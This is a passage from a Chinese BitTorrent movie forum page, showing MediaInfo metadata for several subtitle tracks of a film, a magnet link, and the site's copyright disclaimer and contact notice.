  755. Codec ID/Info                            : UTF-8 Plain Text

  756. Duration                                 : 1 h 50 min

  757. Bit rate                                 : 44 b/s

  758. Count of elements                        : 1354

  759. Stream size                              : 36.1 KiB (0%)

  760. Title                                    : European Spanish

  761. Language                                 : Spanish

  762. Default                                  : No

  763. Forced                                   : No


  764. Text #38

  765. ID                                       : 49

  766. Format                                   : UTF-8

  767. Codec ID                                 : S_TEXT/UTF8

  768. Codec ID/Info                            : UTF-8 Plain Text

  769. Duration                                 : 1 h 50 min

  770. Bit rate                                 : 40 b/s

  771. Count of elements                        : 1314

  772. Stream size                              : 32.7 KiB (0%)

  773. Title                                    : Swedish

  774. Language                                 : Swedish

  775. Default                                  : No

  776. Forced                                   : No


  777. Text #39

  778. ID                                       : 50

  779. Format                                   : UTF-8

  780. Codec ID                                 : S_TEXT/UTF8

  781. Codec ID/Info                            : UTF-8 Plain Text

  782. Duration                                 : 1 h 50 min

  783. Bit rate                                 : 103 b/s

  784. Count of elements                        : 1364

  785. Stream size                              : 83.7 KiB (0%)

  786. Title                                    : Thai

  787. Language                                 : Thai

  788. Default                                  : No

  789. Forced                                   : No


  790. Text #40

  791. ID                                       : 51

  792. Format                                   : UTF-8

  793. Codec ID                                 : S_TEXT/UTF8

  794. Codec ID/Info                            : UTF-8 Plain Text

  795. Duration                                 : 1 h 50 min

  796. Bit rate                                 : 44 b/s

  797. Count of elements                        : 1362

  798. Stream size                              : 36.0 KiB (0%)

  799. Title                                    : Turkish

  800. Language                                 : Turkish

  801. Default                                  : No

  802. Forced                                   : No


  803. Text #41

  804. ID                                       : 52

  805. Format                                   : UTF-8

  806. Codec ID                                 : S_TEXT/UTF8

  807. Codec ID/Info                            : UTF-8 Plain Text

  808. Duration                                 : 1 h 50 min

  809. Bit rate                                 : 71 b/s

  810. Count of elements                        : 1365

  811. Stream size                              : 58.1 KiB (0%)

  812. Title                                    : Ukrainian

  813. Language                                 : Ukrainian

  814. Default                                  : No

  815. Forced                                   : No


  816. Text #42

  817. ID                                       : 53

  818. Format                                   : UTF-8

  819. Codec ID                                 : S_TEXT/UTF8

  820. Codec ID/Info                            : UTF-8 Plain Text

  821. Duration                                 : 1 h 50 min

  822. Bit rate                                 : 54 b/s

  823. Count of elements                        : 1364

  824. Stream size                              : 44.0 KiB (0%)

  825. Title                                    : Vietnamese

  826. Language                                 : Vietnamese

  827. Default                                  : No

  828. Forced                                   : No



TAGS 剧情

磁力链:
  • magnet:?xt=urn:btih:42D3E52DD2157B21436854FFA71EE5C323A1B205
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回